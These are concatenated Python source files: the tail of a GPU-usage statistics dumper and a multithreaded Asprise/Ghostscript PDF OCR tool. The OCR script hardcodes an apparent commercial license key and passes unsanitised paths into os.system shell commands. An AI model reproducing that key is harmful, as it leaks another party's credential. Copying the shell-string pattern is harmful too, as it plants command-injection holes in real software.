json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(demote_list_name, 'w') as fp1:
json.dump(demote_list, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
with open(birthplace_name, 'w') as fp1:
json.dump(birthplace, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
|
ocr_asprise.py
|
#!/usr/bin/python
import os
import sys
import threading
import datetime
import logging
import os.path
from PyPDF2 import PdfFileWriter, PdfFileReader, PdfFileMerger
import traceback
from slugify import slugify
import subprocess
from PIL import Image
from asprise_ocr_api import *
import signal
import time
import random
from datetime import datetime
import shutil
import pdftotext
import re
import codecs
from xml.etree import ElementTree as et
import fnmatch
# pip install -t /project/env/lib/python2.7/dist-packages Pillow==4.0.0
# go to project and run this command: cp /ai/PDF-OCR-RTP/libs/asprise_lib/__init__.py env/lib/python2.7/dist-packages/asprise_ocr_api/
# Install gs
# Remember: install tesseract before running this tool
# env/lib/python2.7/site-packages/asprise_ocr_api/lib/libaocr_x64.so
params = sys.argv
# Setting configure
ghost_script = '/project/lib/ghost_script/bin/gs'
ghost_memory = 300000
timeout = 3
# python ocr_asprise.py file-ext=pdf output-type=TEXT-PDF source-path="/source/path" target-path="/target/path" output-log=output_log.txt rotate=false --help
# !/usr/bin/env python
# set variable
# thread_number = 1
source_path = ''
output_log = ''
target_path = ''
output_type = None
rotate = None
def sig_handler(signum, frame):
print "Segmentation fault occurred"
os.abort()
signal.signal(signal.SIGSEGV, sig_handler)
class ThreadPool(object):
'''
Create thread pool
Following by: http://www.bogotobogo.com/python/Multithread/python_multithreading_Synchronization_Semaphore_Objects_Thread_Pool.php
'''
def __init__(self):
super(ThreadPool, self).__init__()
self.active = []
self.lock = threading.Lock()
def makeActive(self, name):
with self.lock:
self.active.append(name)
logging.debug('Running: %s', self.active)
def makeInactive(self, name):
with self.lock:
try:
self.active.remove(name)
except:
logging.warning('{} not in list'.format(name))
pass
logging.debug('Running: %s', self.active)
def get_thread_number_by_server_cores():
'''
Get thread number by the number of cores CPU
:return:
'''
import multiprocessing
thread_number = multiprocessing.cpu_count() - 1 if multiprocessing.cpu_count() > 1 else multiprocessing.cpu_count()
# thread_number = 100 # for testing
return thread_number
def show_help_syntax():
'''
Show the syntax command to ocr.
:return:
None
'''
print '\n'
print 'Following by syntax: python ocr_asprise.py file-ext=pdf output-type=TEXT-PDF source-path="/source/path" target-path="/target/path" output-log=output_log.txt rotate=false --help'
print '\n'
print 'ocr_asprise.py: the name of the tool'
print 'file-ext: file extension that you will crawl through to OCR'
print 'output-type: there are 3 options here: TEXT (output textfile only), TEXT-PDF (output textfile and PDF), PDF (output PDF only)'
print 'source-path: source where the directory you will need to crawl'
print 'target-path: where you will save the output, keep structure the same'
print 'output-log: path to output files'
print 'rotate: auto rotate the output true/false default false'
def get_params():
'''
Get all parameters from the command line
:return:
1 : success
0 : Use help param
-1 : something went wrong or lack some params
'''
required_params = ['file-ext', 'output-type', 'source-path', 'target-path', 'output-log']
p_dic = {}
if '--help' in params:
show_help_syntax()
return {'code': 0, 'data': None}
else:
print 'params is: {}'.format(params)
for p in params:
values = p.split('=')
try:
key = values[0]
value = values[1]
p_dic[key] = value
show_syntax = False
if key == 'output-log':
output_path = os.path.dirname(value)
if not os.path.exists(output_path):
# show_syntax = True
logging.info('Create new output dir: {}'.format(output_path))
mkdir_cm = 'mkdir -p {}'.format(output_path)
os.system(mkdir_cm)
if key == 'source-path':
if not os.path.exists(value):
show_syntax = True
if key == 'target-path':
if not os.path.exists(value):
logging.info('Create new target-path: {}'.format(value))
mkdir_cm = 'mkdir -p {}'.format(value)
os.system(mkdir_cm)
if show_syntax:
print 'The path {} does not exist. Please check it again'.format(key)
return {'code': -1, 'data': None}
except:
show_help_syntax()
pass
if set(required_params) < set(p_dic.keys()):
return {'code': 1, 'data': p_dic}
else:
return {'code': -1, 'data': None}
def get_number_of_pages(file_path):
'''
Get number of pages pdf
:param file_path:
:return:
0: something went wrong
number of pages: success
'''
num_pages = 0
with open(file_path, 'rb') as f:
try:
pdf_input = PdfFileReader(f, strict=False)
num_pages = pdf_input.getNumPages()
except:
logging.error('The file {} can\'t get number of pages.'.format(file_path))
pass
return num_pages
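# convert_pdf_to_txt() below decides whether a PDF already contains a usable text layer: it extracts the
# text with pdftotext, substitutes each run of non-alphabetic characters that is followed by a space with '@',
# strips the spaces, and treats the file as non-searchable (code 0) when '@' makes up more than half of what
# is left; otherwise it returns the extracted text with code 1.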
def convert_pdf_to_txt(path):
'''
Check whether a PDF is searchable or not
Following by: https://github.com/jalan/pdftotext
:param path: the path pointing to the input file
:return:
1: is searchable
0: non-searchable
'''
with open(path, "rb") as f:
pdf = pdftotext.PDF(f)
text = "\n\n".join(pdf)
# Read all the text into one string
tmp_text = re.sub('[^A-Za-z ]+ ', '@', text).replace(' ', '')
if tmp_text.strip():
special_character_number = len(re.findall('\@', tmp_text))
if special_character_number / float(len(tmp_text)) > 0.5:
return {'code': 0, 'text': ''}
return {'code': 1, 'text': text.strip()}
return {'code': 0, 'text': ''}
def detect_orientation(image_path):
def execute_and_rotate_image(cmd):
from subprocess import Popen, PIPE, STDOUT
popen = Popen(cmd, stderr=STDOUT, stdout=PIPE, shell=False)
out = popen.communicate()[0]
if 'Orientation in degrees:' in out:
try:
degrees = int(out.split('Orientation in degrees:', 1)[1].split('\n', 1)[0].strip())
except Exception as error:
traceback.print_exc()
degrees = 0
if degrees == 180:
# Rotate all images correctly
logging.info('The image {} will be rotate {} degree'.format(image_path, degrees))
# Load the original image:
img = Image.open(image_path)
img2 = img.rotate(degrees)
img2.save(image_path)
popen.stdout.close()
# return_code = popen.wait()
execute_and_rotate_image(
['tesseract', image_path, '-', '-psm', '0']
)
def write_log(log_file, search_file, status, error_message=''):
'''
Write the logs to log file
:param log_file:
:param search_file:
:param status:
1: success
0: blank
-1: failed
:return:
None
'''
timestamp = str(datetime.now())
if status == 1:
status = 'SUCCESS'
elif status == 0:
status = 'BLANK'
else:
status = 'ERROR'
with open(log_file, 'a') as f:
log = '[{}][{}][{}]: {}'.format(timestamp, status, error_message, search_file)
f.write(log)
f.write('\n')
def is_finish(dir, num_pages, ocr_type):
'''
Check whether all output files for the PDF have been produced
:param dir: directory that holds the per-page output files
:param num_pages: number of pages of the pdf file
:param ocr_type:
-1: XML
1: PDF and TEXT
2: PDF only
3: TEXT only
:return:
0: not finished / failed
1: success
'''
try:
if ocr_type == -1:
number_of_file_xml = len(fnmatch.filter(os.listdir(dir), '*.xml'))
if number_of_file_xml == num_pages:
return 1
return 0
else:
number_of_file_pdf = len(fnmatch.filter(os.listdir(dir), '*.pdf'))
number_of_file_txt = len(fnmatch.filter(os.listdir(dir), '*.txt'))
if ocr_type == 1:
if (number_of_file_pdf + number_of_file_txt) == num_pages * 2:
return 1
else:
if (number_of_file_pdf + number_of_file_txt) == num_pages:
return 1
return 0
except Exception as error:
traceback.print_exc()
return 0
def check_ocr_is_finish_by_file_path(file_name, dest_path, output_type):
'''
Check whether the file has already been OCRed or not
:param file_name: the name of input file
:param dest_path:
:param output_type:
:return:
True: has already been OCRed
False: not finished yet
'''
try:
_output_type = output_type.lower().split('-')
except:
pass
for o in _output_type:
if o == 'text':
o = 'txt'
if not os.path.exists('{}/{}.{}'.format(dest_path, file_name, o)):
return False
return True
def get_orc_engine_instance():
try:
Ocr.input_license("ent_SINGLE_2_Seats-Neubus-OS202800000800", "93513-5B34F-32BA4-FF1E4")
Ocr.set_up() # one time setup
ocrEngine = Ocr()
ocrEngine.start_engine("eng")
return ocrEngine
except:
traceback.print_exc()
return None
def combine_xml(files):
'''
Merge all xml files
:param files: list of xml file path
:return:
XML file
'''
first = None
for filename in files:
data = et.parse(filename).getroot()
if first is None:
first = data
else:
first.extend(data)
if first is not None:
return et.tostring(first)
def _process_xml(s, pool, fp, xml_out):
'''
Threading for processing xml when pdf file is a searchable pdf
:param s:
:param pool:
:param fp: path of input pdf file
:param xml_out: path of file xml
:return:
- None
'''
with s:
t_name = threading.currentThread().getName()
pool.makeActive(t_name)
try:
from multiprocessing.pool import ThreadPool
_pool = ThreadPool(processes=1)
async_result = _pool.apply_async(get_orc_engine_instance, ())
ocrEngine = async_result.get()
if not ocrEngine:
logging.error('Can\'t create new OCR engine instance.')
return 0
xml_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_XML,
PROP_IMG_PREPROCESS_TYPE='custom')
with codecs.open(xml_out, "w", encoding="utf-8") as f:
f.write(xml_data)
write_log(output_log, xml_out, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, xml_out, -1, str(error))
pool.makeInactive(t_name)
def _ocr_process_by_png_file(s, pool, fp, tmp_dir, pdf_name, output_type, output_log, number_of_pages, rotate=False,
delete_temp=False):
'''
Implement OCR for threading by PNG files
Following by: https://stackoverflow.com/questions/13657341/how-do-i-append-new-data-to-existing-xml-using-python-elementtree
:param s: threading use semaphore technique
:param pool: number of threads that run at a same time.
:return:
1: success
0: failed
'''
try:
_output_type = output_type.lower().split('-')
except:
pass
_time = 0
while (True):
try:
if _time > timeout:
logging.error('Something went wrong with pdf file: {}'.format(pdf_name))
return 0
with s:
t_name = threading.currentThread().getName()
pool.makeActive(t_name)
# Code here
temp_image_path = '{}/{}_{}.png'.format(tmp_dir, pdf_name, format(int(t_name), "06"))
searchable_pdf_path = '{}/{}_{}.pdf'.format(tmp_dir.rsplit('/', 1)[0], pdf_name,
format(int(t_name), "06"))
searchable_txt_path = '{}/{}_{}.txt'.format(tmp_dir.rsplit('/', 1)[0], pdf_name,
format(int(t_name), "06"))
tmp_xml_path = '{}/{}_{}.xml'.format(tmp_dir.rsplit('/', 1)[0], pdf_name, format(int(t_name), "06"))
_time = 0
while not os.path.exists(temp_image_path):
_time = _time + 1
if _time == timeout:
return 0 # timeout
time.sleep(_time)
# Following by: https://tpgit.github.io/Leptonica/readfile_8c_source.html
if os.stat(temp_image_path).st_size < 20:
time.sleep(1)
print ('Ocring pdf file is starting ... File path: %s' % searchable_pdf_path)
from multiprocessing.pool import ThreadPool
_pool = ThreadPool(processes=1)
async_result = _pool.apply_async(get_orc_engine_instance, ())
ocrEngine = async_result.get()
if not ocrEngine:
logging.error('Can\'t create new OCR engine instance.')
return 0
xml_data = None
if rotate:
detect_orientation(temp_image_path)
ocr_type = 0
time.sleep(random.uniform(0.1, 1.1))
if 'xml' in _output_type:
ocr_type = -1
xml_data = ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_XML,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
# Create xml file here
try:
xml_data = xml_data.replace('no="0"', 'no="{}"'.format(int(t_name) - 1))
if int(t_name) == 1:
xml_data = xml_data.replace(str(temp_image_path), str(fp))
with codecs.open(tmp_xml_path, "w", encoding="utf-8") as f:
f.write(xml_data)
write_log(output_log, tmp_xml_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, tmp_xml_path, -1, str(error))
if delete_temp:
xml_flag = True
_time_fs = 0
while not is_finish(tmp_dir.rsplit('/', 1)[0], number_of_pages, ocr_type):
_time_fs = _time_fs + 1
if _time_fs >= timeout * 5:
logging.error('Timed out while processing OCR')
xml_flag = False
time.sleep(_time_fs)
tmp_xml_list = [
'{}/{}_{}.xml'.format(tmp_dir.rsplit('/', 1)[0], pdf_name, format(int(i + 1), "06")) for i
in range(number_of_pages)]
final_xml_data = combine_xml(tmp_xml_list)
if xml_flag:
try:
final_xml_path = '{}/{}.xml'.format(tmp_dir.rsplit('/', 2)[0], pdf_name)
with codecs.open(final_xml_path, "w", encoding="utf-8") as f:
f.write(final_xml_data)
write_log(output_log, final_xml_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, final_xml_path, -1, str(error))
else:
logging.error('Can\'t create XML file, timeout occurred while waiting to merge xml file')
write_log(output_log, '{}/{}.xml'.format(tmp_dir.rsplit('/', 2)[0], pdf_name), -1, 'timeout occurred while merging xml files')
if 'text' in _output_type and 'pdf' in _output_type:
ocr_type = 1
ocr_data = ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False)
# Create text file here
try:
with codecs.open(searchable_txt_path, "w", encoding="utf-8") as f:
f.write(ocr_data)
write_log(output_log, searchable_txt_path, 1)
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_txt_path, -1, str(error))
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'pdf' in _output_type:
ocr_type = 2
try:
ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False, )
# Write the result to the log file
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'text' in _output_type:
ocr_type = 3
ocr_data = ocrEngine.recognize(temp_image_path, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PLAINTEXT,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
# Create text file here
try:
with open(searchable_txt_path, 'w') as f:
ocr_data = u''.join(ocr_data).encode('utf-8').strip()
f.write(ocr_data)
write_log(output_log, searchable_txt_path, 1)
except Exception as error:
write_log(output_log, searchable_pdf_path, -1, str(error))
ocrEngine.stop_engine()
if delete_temp:
_time_fs = 0
while not is_finish(tmp_dir.rsplit('/', 1)[0], number_of_pages, ocr_type):
_time_fs = _time_fs + 1
if _time_fs >= timeout * 5:
logging.error('Timed out while processing OCR')
return 0
time.sleep(_time_fs)
src_path = tmp_dir.rsplit('/', 1)[0]
dest_path = tmp_dir.rsplit('/', 2)[0]
merge_pdf_pages_and_text_file(src_path, dest_path, pdf_name)
# Remove tmp forder
logging.info('Remove the directory: {}'.format(tmp_dir))
shutil.rmtree(tmp_dir.rsplit('/', 1)[0])
pool.makeInactive(t_name)
return 1
except Exception as error:
traceback.print_exc()
# Write the result to the log file
write_log(output_log, searchable_pdf_path, -1, str(error))
pass
_time = _time + 1
def merge_pdf_pages_and_text_file(src_path, dest_path, pdf_name):
'''
Appending PDF files | text files to new one.
:param src_path:
:param dest_path:
:param pdf_name:
:return:
'''
# Merge pdf pages
merger = PdfFileMerger()
pdf_pages = []
for dirpath, dirnames, filenames in os.walk(src_path):
for filename in [f for f in filenames if f.endswith(".pdf")]:
pdf_pages.append(os.path.join(dirpath, filename))
if pdf_pages:
pdf_pages.sort()
for _file in pdf_pages:
print ('_file pdf is: {}'.format(_file))
merger.append(PdfFileReader(file(_file, 'rb')))
merger.write('{}/{}.pdf'.format(dest_path, pdf_name))
# Merges txt pages
txt_pages = []
for dirpath, dirnames, filenames in os.walk(src_path):
for filename in [f for f in filenames if f.endswith(".txt")]:
txt_pages.append(os.path.join(dirpath, filename))
if txt_pages:
txt_pages.sort()
for _file in txt_pages:
content = ''
print ('_file txt is: {}'.format(_file))
try:
with open(_file) as f:
content = str(f.readlines())
except:
logging.warning('Can\'t get content of file: {}'.format(_file))
pass
if content:
with open('{}/{}.txt'.format(dest_path, pdf_name), 'a') as myfile:
myfile.write(u''.join(content).encode('utf-8').strip())
def run_tracking_file(output_type, source_path, target_path, output_log, rotate, ocr_all):
'''
Run tracking file
:param output_type:
:param source_path:
:param target_path:
:param output_log:
:param rotate:
:param ocr_all:
:return:
'''
# Get current path:
current_path = os.path.dirname(os.path.abspath(__file__))
# Start tracking file to monitor the OCR tool
try:
# Checking if the Asprise lib get stuck
pid = os.getpid()
file_ext = 'pdf'
run_tracking_cm = 'python {}/tracking.py {} {} {} {} {} {} {} {}'.format(
current_path,
pid,
file_ext,
output_type,
source_path,
target_path,
output_log,
rotate,
ocr_all,
).split(' ')
# os.system(run_tracking_cm)
from subprocess import call
call(run_tracking_cm)
except:
traceback.print_exc()
return 0
return 1
def orc_process(s, pool, files_path, source_path, target_path, output_type, output_log, rotate=False, ocr_all=False):
'''
Implement OCR process
:param s: threading use semaphore technique
:param pool: number of threads that run at a same time.
:param files_path: path of all files in the source directory
:param target_path: path of directory which contains all output files
:param output_log: path of directory which contains the log file
:param rotate: auto rotate the output true/false default false
:return:
None
'''
tracking_thread = threading.Thread(target=run_tracking_file, args=(output_type, source_path, target_path, output_log, rotate, ocr_all,))
tracking_thread.daemon = True
tracking_thread.start()
orc_list = []
for fp in files_path:
print ('\n')
print ('File path is: {}'.format(fp))
number_of_pages = get_number_of_pages(fp)
images_list = []
if number_of_pages:
file_name = os.path.basename(fp).rsplit('.pdf', 1)[0]
dir = os.path.dirname(fp)
sub_dir = dir.split(source_path)[1].strip('/')
convert = convert_pdf_to_txt(fp)
if check_ocr_is_finish_by_file_path(file_name, '/{}/{}'.format(target_path.strip('/'), sub_dir), output_type):
continue
if not convert['code'] or ocr_all:
if not ocr_all:
# Do OCR
tmp_dir = '{}/{}/{}/{}'.format(target_path, sub_dir, slugify(file_name),
'tmp_dir') if sub_dir else '{}/{}/{}'.format(target_path,
slugify(file_name),
'tmp_dir')
logging.info('Create a new temp dir: {}'.format(tmp_dir))
if not os.path.exists(tmp_dir):
mkdir_command = 'mkdir %s -p' % tmp_dir
os.system(mkdir_command)
generate_image(fp, number_of_pages, tmp_dir, images_list)
for i in images_list:
i.start()
time.sleep(1)
for i in range(number_of_pages):
delete_tmp = False
if i == number_of_pages - 1: # last page
delete_tmp = True
t = threading.Thread(target=_ocr_process_by_png_file, name=str(i + 1),
args=(
s, pool, fp, tmp_dir, file_name, output_type, output_log, number_of_pages,
rotate, delete_tmp))
else:
t = threading.Thread(target=_ocr_process_by_png_file, name=str(i + 1),
args=(
s, pool, fp, tmp_dir, file_name, output_type, output_log, number_of_pages,
rotate, delete_tmp))
orc_list.append(t)
else:
dest_path = '/{}/{}'.format(target_path.strip('/'), sub_dir) if sub_dir else target_path
t = threading.Thread(target=_ocr_process_by_pdf_file, name=str(file_name),
args=(s, pool, fp, file_name, dest_path, output_type, output_log))
t.start()
else:
# Copy this file to target folder
try:
_output_type = output_type.lower().split('-')
except:
pass
_target_dir = '{}/{}'.format(target_path, sub_dir) if sub_dir else target_path
if 'pdf' in _output_type:
try:
print 'The file: {} has orced already, it will be copied to target folder.'.format(fp)
print 'Create a target dir: {}'.format(_target_dir)
if not os.path.exists(_target_dir):
mkdir_command = 'mkdir %s -p' % _target_dir
os.system(mkdir_command)
cp_command = 'cp -R {} {}'.format(fp, _target_dir)
os.system(cp_command)
write_log(output_log, fp, 1)
except Exception as error:
write_log(output_log, fp, -1, str(error))
if 'text' in _output_type:
# write file text
try:
text = convert['text'].strip()
text_path = '{}/{}.txt'.format(_target_dir, file_name)
with codecs.open(text_path, "w", encoding="utf-8") as f:
f.write(text)
write_log(output_log, text_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, text_path, -1, str(error))
if 'xml' in _output_type:
xml_out = '{}/{}.xml'.format(_target_dir, file_name)
t = threading.Thread(target=_process_xml, name=str(file_name), args=(s, pool, fp, xml_out))
t.start()
# Generating the template images
logging.info('Generating the template images ...')
for c in orc_list:
c.start()
return 1
def _ocr_process_by_pdf_file(s, pool, fp, pdf_name, dest_path, output_type, output_log,):
'''
Implement OCR for threading by PDF file
:param s: threading use semaphore technique
:param pool: number of threads that run at a same time.
:return:
1: success
0: failed
'''
try:
_output_type = output_type.lower().split('-')
except:
pass
with s:
t_name = threading.currentThread().getName()
pool.makeActive(t_name)
try:
from multiprocessing.pool import ThreadPool
_pool = ThreadPool(processes=1)
async_result = _pool.apply_async(get_orc_engine_instance, ())
ocrEngine = async_result.get()
if not ocrEngine:
logging.error('Can\'t create new OCR engine instance.')
return 0
if not os.path.exists(dest_path):
os.system('mkdir -p {}'.format(dest_path))
xml_path = '{}/{}.xml'.format(dest_path, pdf_name)
searchable_pdf_path = '{}/{}.pdf'.format(dest_path, pdf_name)
searchable_txt_path = '{}/{}.txt'.format(dest_path, pdf_name)
if 'xml' in _output_type:
logging.info('OCRing with the xml file output')
xml_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_XML,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
try:
with codecs.open(xml_path, "w", encoding="utf-8") as f:
f.write(xml_data)
write_log(output_log, xml_path, 1)
except Exception as error:
traceback.print_exc()
write_log(output_log, xml_path, -1, str(error))
if 'text' in _output_type and 'pdf' in _output_type:
ocr_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False)
# Create text file here
try:
with codecs.open(searchable_txt_path, "w", encoding="utf-8") as f:
f.write(ocr_data)
write_log(output_log, searchable_txt_path, 1)
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_txt_path, -1, str(error))
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'pdf' in _output_type:
try:
ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PDF,
PROP_PDF_OUTPUT_FILE=searchable_pdf_path,
PROP_PDF_OUTPUT_RETURN_TEXT='text',
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()",
PROP_PDF_OUTPUT_TEXT_VISIBLE=False, )
# Write the result to the log file
write_log(output_log, searchable_pdf_path, 1)
except Exception as error:
write_log(output_log, searchable_pdf_path, -1, str(error))
elif 'text' in _output_type:
ocr_data = ocrEngine.recognize(fp, -1, -1, -1, -1, -1,
OCR_RECOGNIZE_TYPE_TEXT, OCR_OUTPUT_FORMAT_PLAINTEXT,
PROP_IMG_PREPROCESS_TYPE='custom',
PROP_IMG_PREPROCESS_CUSTOM_CMDS="scale(2);default()")
# Create text file here
try:
with codecs.open(searchable_txt_path, "w", encoding="utf-8") as f:
f.write(ocr_data.strip())
write_log(output_log, searchable_txt_path, 1)
except Exception as error:
write_log(output_log, searchable_txt_path, -1, str(error))
ocrEngine.stop_engine()
pool.makeInactive(t_name)
return 1
except Exception as error:
traceback.print_exc()
logging.error('Something went wrong!')
pool.makeInactive(t_name)
return 0
def execute_not_wait(cmd):
# print 'cmd is: {}'.format(cmd)
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=False)
popen.stdout.close()
def _generate_image(pdf_file, dir, s_device=None):
'''
Implement generate template images
:param pdf_file: the path of pdf file
:param dir: the directory which stores the images
:return: None
'''
pdf_name = os.path.basename(pdf_file).rsplit('.pdf', 1)[0]
print 'Pdf name is: {}'.format(pdf_name)
print 'png images: {}'.format('-sOutputFile={}/{}_%06d.png'.format(dir, pdf_name))
if not s_device:
s_device = 'pnggray'
print 'Ghost script path is: {}'.format(ghost_script)
# Generate temp images
# /project/fbone/fbone/fbone/lib/ghostscript/bin/gs -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pnggray -dINTERPOLATE -r300 -dDownScaleFactor=2 -sOutputFile=out2%d.png 1d63bab297c5bb9f9c4a4f36e10d18_1491734332.pdf -c 30000000
execute_not_wait([
ghost_script, '-dSAFER', '-dBATCH', '-dNOPAUSE', '-sDEVICE={}'.format(s_device), '-dINTERPOLATE',
'-r300', '-dPDFSETTINGS=/prepress', '-dPDFFitPage', '-dDownScaleFactor=2',
'-sOutputFile={}/{}_%06d.png'.format(dir, pdf_name), '-dUseTrimBox=true', '-dUseCropBox=true', '-f',
str(pdf_file),
'-c', '{}'.format(ghost_memory),
])
def generate_image(pdf_file, num_pages, tmp_dir, images_list):
'''
Generate 2 PNG files per PDF (1 for thumbnail and 1 regular size)
:param pdf_file:
:param dir:
:return:
- 1: success
- 0: fail
'''
print ('generate image for file: {} ...'.format(pdf_file))
try:
pages_have_color = detect_color_in_pdf(pdf_file)
if num_pages:
if len(pages_have_color) / float(num_pages) < 0.5:
s_device = 'pnggray'
else:
s_device = 'png16m'
t = threading.Thread(target=_generate_image, name=str('tmp_image'),
args=(pdf_file, tmp_dir, s_device))
images_list.append(t)
# t.start()
else:
logging.error('Pdf file invalid, number of pages equal 0')
except Exception as error:
traceback.print_exc()
def is_float(s):
'''
Check whether a value is a float type or not
:param s: value
:return:
- True: is a float type
- False: isn't a float type
'''
try:
float(s) # for int, long and float
except ValueError:
return False
return True
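# detect_color_in_pdf() below runs Ghostscript with the 'inkcov' device, which prints per-page CMYK ink
# coverage; a page is counted as coloured when any of the C, M or Y components is non-zero. The caller
# (generate_image) uses the ratio of coloured pages to choose between the 'pnggray' and 'png16m'
# rasterisation devices.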
def detect_color_in_pdf(pdf_file):
'''
Detect color in pdf file
:param pdf_file:
:return:
'''
def execute_and_get_page_which_contain_color(cmd):
pages_have_color = []
try:
# print 'cmd is: {}'.format(cmd)
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=False)
output, error = popen.communicate()
popen.stdout.close()
lines = output.strip().split('\n')
for line in lines:
if 'CMYK OK' in line:
ink_values = [float(value) for value in line.split(' ') if value and is_float(value)]
if ink_values[0] > 0 or ink_values[1] > 0 or ink_values[2] > 0:
pages_have_color.append(lines.index(line))
except:
pass
return pages_have_color
pages_have_color = execute_and_get_page_which_contain_color([
ghost_script, '-q', '-o', '-', '-sDEVICE=inkcov', pdf_file
])
return pages_have_color
if __name__ == '__main__':
p_rs = get_params()
if p_rs.get('code', -1) > 0:
params = p_rs['data']
# Get number of cores CPU
thread_number = params['thread-number'] if 'thread-number' in params else get_thread_number_by_server_cores()
print ('thread number is: {}'.format(thread_number))
pool = ThreadPool()
s = threading.Semaphore(thread_number)
source_path = params['source-path']
source_path = source_path[:-1] if source_path[-1] == '/' else source_path
output_log = params['output-log']
target_path = params['target-path']
target_path = target_path[:-1] if target_path[-1] == '/' else target_path
output_type = params['output-type']
rotate = params.get('rotate', False)
if rotate and str(rotate).lower() == 'true':
rotate = True
else:
rotate = False
# If ocr-all=true then it will just use Asprise to OCR all of the PDFs without worrying about searchable vs non-searchable
# and no need to detect page orientation (create a png files)
ocr_all = params.get('ocr-all', False)
if ocr_all and str(ocr_all).lower() == 'true':
ocr_all = True
else:
ocr_all = False
# Get all files in the dir and sub-dirs
files_path = []
for dirpath, dirnames, filenames in os.walk(source_path):
for filename in [f for f in filenames if f.endswith(".{}".format(str(params['file-ext']).lower()))]:
files_path.append(os.path.join(dirpath, filename))
print '\n'
print '***************************** params *****************************'
print 'files path is: {}'.format(files_path)
print 'source_path is: {}'.format(source_path)
print 'output log is: {}'.format(output_log)
print 'target_path is:{}'.format(target_path)
print 'rotate is: {}'.format(rotate)
print 'ocr_all is: {}'.format(ocr_all)
print '***************************** params *****************************'
r = orc_process(s, pool, files_path, source_path, target_path, output_type, output_log, rotate, ocr_all,)
if not r:
logging.error('Can\'t start tracking tool.')
|
kernel-generator.py
|
